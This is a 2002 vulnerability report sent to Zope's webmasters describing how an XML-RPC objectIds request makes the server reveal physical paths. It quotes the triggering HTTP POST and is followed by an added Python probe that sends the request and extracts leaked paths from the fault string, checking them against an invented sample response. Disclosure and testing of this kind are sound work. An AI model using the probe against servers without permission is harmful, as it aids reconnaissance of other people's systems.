----- Original Message -----
From: "Rossen Raykov" <raikovr@yahoo.com>
To: <webmaster@zope.org>; <webmaster@zope.com>
Cc: <sacure@zope.org>; <secure@zope.com>
Sent: Thursday, April 18, 2002 10:41 PM
Subject: Zope insecure handling on XML-RPC will reveal information about the server's physical paths.
A request like the one quoted below will cause Zope to reveal information about physical paths on the server and about the local servers to which it is relaying (the last one may be a misconfiguration; sorry, I'm not so familiar with the platform).
As far as I know, this problem is present on all currently released Zope versions, including 2.5.0.
Running the server without the -D option wouldn't help.
The latest version from CVS seems to handle this correctly.
Thanks to Chris Withers and Shane Hathaway, I was able to test it on the build from 15/04/02, and it worked just fine.
I'm interested to know if there is any other way to fix that bug.
BTW, when will the next release be available?
Regards,
Rossen
-------- CUT HERE ---------
POST /Foo/Bar/MyFolder HTTP/1.0
Content-Type: text/xml
Content-length: 95

<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>
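An added example, not part of the report above and not Zope's own code: a small Python probe that reproduces the POST from the message (objectIds with no params), parses the XML-RPC response with the standard library, and reports any filesystem paths found in the fault string, which is where a publisher traceback would surface. The fault response embedded below is constructed for offline use (its traceback and paths are made up), and the host, port and folder path passed to probe() are the caller's assumptions.

```python
"""Probe for XML-RPC fault responses that disclose server filesystem paths.

Added example, not from the original report or from Zope. The request body is
the one quoted in the report; the sample fault below is constructed and its
paths are invented for illustration.
"""
import http.client
import re
import xmlrpc.client

# Exact body from the report: call objectIds with no parameters.
REQUEST_BODY = (
    b'<?xml version="1.0"?>\n'
    b'<methodCall>\n'
    b'<methodName>objectIds</methodName>\n'
    b'<params/>\n'
    b'</methodCall>\n'
)

# Absolute POSIX paths and drive-letter Windows paths with at least one
# directory component; this is what a leaked traceback typically contains.
_PATH_RE = re.compile(
    r'(?:/(?:[\w.-]+/)+[\w.-]+)'              # /usr/local/zope/.../Publish.py
    r'|(?:[A-Za-z]:\\(?:[\w.-]+\\)+[\w.-]+)'  # C:\Zope\lib\...\Publish.py
)

# Constructed sample of a fault response. The traceback text and the
# /usr/local/zope/... paths are made up; they are not from a real server.
SAMPLE_FAULT_RESPONSE = b"""<?xml version="1.0"?>
<methodResponse>
<fault>
<value><struct>
<member><name>faultCode</name><value><int>-1</int></value></member>
<member><name>faultString</name><value><string>Traceback (innermost last):
  File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 150, in publish_module
  File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 380, in objectIds
AttributeError: aq_parent
</string></value></member>
</struct></value>
</fault>
</methodResponse>
"""


def request_headers(body: bytes) -> dict:
    """Headers for the report's POST, with Content-Length computed from the
    body instead of hard-coded (the report shows a fixed 95)."""
    return {"Content-Type": "text/xml", "Content-Length": str(len(body))}


def fault_from_response(raw: bytes):
    """Return the xmlrpc.client.Fault carried by a response, or None when the
    response is an ordinary result (xmlrpc.client.loads raises on faults)."""
    try:
        xmlrpc.client.loads(raw)
    except xmlrpc.client.Fault as fault:
        return fault
    return None


def find_path_leaks(text: str) -> list:
    """Unique filesystem-looking strings in text, in first-seen order."""
    found = []
    for match in _PATH_RE.findall(text):
        if match not in found:
            found.append(match)
    return found


def leaked_paths(raw: bytes) -> list:
    """Paths disclosed by an XML-RPC response. Only the fault string is
    inspected; a successful result yields an empty list."""
    fault = fault_from_response(raw)
    if fault is None:
        return []
    return find_path_leaks(str(fault.faultString))


def probe(host: str, port: int, path: str = "/Foo/Bar/MyFolder",
          timeout: float = 10.0) -> list:
    """Send the report's request to a live server and return leaked paths.
    Needs network access; host, port and path are assumptions of the caller."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", path, body=REQUEST_BODY,
                     headers=request_headers(REQUEST_BODY))
        raw = conn.getresponse().read()
    finally:
        conn.close()
    return leaked_paths(raw)


if __name__ == "__main__":
    # Offline demonstration against the constructed sample.
    for leaked in leaked_paths(SAMPLE_FAULT_RESPONSE):
        print("leaked:", leaked)
```

Against a server that has the fix, a fault (if any) should come back without a traceback in faultString and leaked_paths() returns an empty list; against an affected build, each path in the list is something an attacker learns for free by posting a five-line XML body to any folder URL.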